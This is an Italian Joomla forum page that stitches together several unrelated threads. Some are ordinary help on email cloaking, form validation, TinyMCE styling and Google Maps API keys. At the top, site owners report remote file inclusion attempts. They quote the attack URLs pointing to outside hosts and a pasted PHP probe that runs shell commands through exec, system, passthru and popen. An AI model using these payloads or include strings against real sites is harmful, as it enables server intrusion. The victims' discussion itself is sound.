@Nemesis_RM said:

Scusate ragazzi proprio in questo momento ho visto che è arrivata una visita su un mio sito Joomla con una roba del genere:

www . miosito.it/?mosConfig_absolute_path="h"t t p : // rise.dk/cache/id2.txt?

aperto il file ho trovato questo:

[php]
<?php
if((@eregi("uid",ex("id"))) || (@eregi("Windows",ex("net start")))){
$contrs=0;
}
else{
ini_restore("safe_mode");
ini_restore("open_basedir");
if((@eregi("uid",ex("id"))) || (@eregi("Windows",ex("net start")))){
$contrs=0;}
else{
$contrs=1;
}}

if($contrs == 0){
echo("FUCKSAFEMODEOFFBYMIC22");
}else{
echo("FUCKSAFEMODEONBYMIC22");
}

function ex($cfe){
$res = '';
if (!empty($cfe)){
if(function_exists('exec')){
@exec($cfe,$res);
$res = join("\n",$res);
}
elseif(function_exists('shell_exec')){
$res = @shell_exec($cfe);
}
elseif(function_exists('system')){
@ob_start();
@system($cfe);
$res = @ob_get_contents();
@ob_end_clean();
}
elseif(function_exists('passthru')){
@ob_start();
@passthru($cfe);
$res = @ob_get_contents();
@ob_end_clean();
}
elseif(@is_resource($f = @popen($cfe,"r"))){
$res = "";
while(!@feof($f)) { $res .= @fread($f,1024); }
@pclose($f);
}}
return $res;
}
exit;[/php]Cos'è secondo voi?

Ciao Nemesis_RM, premetto che non ho esperienza in materia di attacchi quindi vorrei capire meglio quel che ti è accaduto perchè accade la stessa cosa anche a me ed anche sotto altre forme del tipo:
/index.php?pag=f t p : // 80.50.253.90/upload/trop/old?
/index.php?pag=h t t p : // mifumisokuimsedfsisumsdoklop.mail15.su/image?
/index.php?option=com_content&amp;amp;task=view&amp;amp;id=19&amp;amp;Itemid=34&amp;lang=it&lang=en
/index.php?pag=h t t p : // www . wsteam.net/include.c?
/index.php?pag=h t t p : // amygirl.webs.io/pb.php?
/index.php?pag=h t t p : // hotaebywk.chat.ru/html/body?

Quando dici: " aperto il file ho trovato questo:" intendi dire che sei andato all'URL h t t p : // rise.dk/cache/id2.txt? ed il browser ti ha mostrato quel codice? oppure hai trovato il file nelle cartelle del tuo sito? Perchè se così fosse significa che l'attacco è riuscito. Potresti aiutarmi a capire?:?
Grazie ciao.

Salve a tutti, sto cercando di inserire un link per aggiungere il mio contatto MSN. Il problema che riscontro è il seguente:
Il mambot email cloaking individua l'indirizzo email e coma da regole lo sostituisce con un codice javascript che rende illegibile l'indirizzo email.
Fin qui mi può star bene, ma purtroppo è implementato in modo da funzionare correttamente su link testuali e non su immagini che linkano con vorrei fare io. Inoltre mi sembra di capire che il mambot è studiato in modo che venga inserito nel tag a l'elemento mailto: mentre nel mio caso desidererei che ci fosse msnim:
Qualcuno di voi ha già affrontato il problema?

Mi dispiacerebbe di dover disattivare il mambot, potreste darmi una mano?
Ringrazio tutti e vi auguro un felice nuovo anno.

@fabio.farolfi said:

Ciao gkweb hai fatto delle prove dal Tab Validation? Non mi sembra trascurata, i controlli di validazione mi sembrano più che sufficienti, ma forse hai esigenze più particolari?

Comunque, grazie a GloboGsm a cui ho affidato il lavoro ho risolto il mio problema.
GloboGsm sempre disponibile, grazie ancora

Si in effetti le mie valutazioni sono state affrettate :imb: ora che ho installato il componente devo dire che risulta davvero ottimo.

@GloboGsm said:

Se un utente salta la compilazione di un campo con richiesta di validazione, e invia la richiesta, viene restituito un alert che ti indica quale campo hai dimenticato di compilare...

...questa è una prassi normale, come in un qualsiasi altro form, ora non so cosa tu intenda per una validazione piu complessa...magari mostraci un esempio di validazione complessa, e approfondiamo il discorso

Intendevo una validazione che non sia esclusimanente lato client come quella javascript bensì una validazione php

@adirontack said:

piccolo up (magari è passato inosservato)!
Mi urge risolvere soprattutto il problema del forum.

Ciao adirontack, credo che se copi il file editor_content.css che si trova nella cartella manbots\editors\tinymce(o l'editor che utilizzi)\jscripts\tiny_mce\themes\advanced\css e lo incolli nella cartella css del template che stai utilizzando dovresti risolvere. Aspettiamo notizie

Scusate se mi inserisco ma anche io sono interessato all'argomento. Dunque il componente mi sembra molto interessante tuttavia guardando i tutorial disponibili sul sito ho l'impressione che la parte dedicata alla validazione dei form sia stata volutamente trascurata. Inoltre non volendo accontentarsi di una semplice validazione javascript, come ci si deve muovere? GloboGsm tu hai già potuto sperimentare una validazione più solida? Se si come hai risolto?

@trench said:

E' semplice......vai in questa pagina http://www.google.com/apis/maps/, accetti i termini e condizioni, inserisci l'URL del tuo dominio dove utlizzerai Google Maps e poi verrà generato l'API Key che inserirai nella apposito campo di testo del modulo o componente che utilizzi. Ciao

Grazie trench :), per caso hai già tentato di utilizzare le mappe direttamente da codice senza dover ricorrere al componente? Pensavo di fare una prova visto che tutto sommato si tratta di aggiungere un livello (div) e una funzione javascript.

Grazie GloboGsm per il benvenuto e per la celere risposta.

@trench said:

si si inserita. Credo sia un pò macchinoso e troppo complicato per quello che mi serve. L'ho disinstallato e ho installato il modulo sicuramente più intuitivo e semplice e veloce per le mappe moolet_google_maps. Poi dipende sempre dalle necessità.....

Ciao trench devo richiedere una API Key di google maps da utilizzare su un sito joomla. Se non ho capito male la chiave vale per un?intera directory su un dominio es. se la richiedo per dominio.it non varrà per dominio.it/cartella/ e viceversa. Nel caso di joomla, quindi, è corretto indicare dominio.it vero? Visto che te hai già affrontato l'argomento, potresti chiarirmi questo aspetto?
Grazie.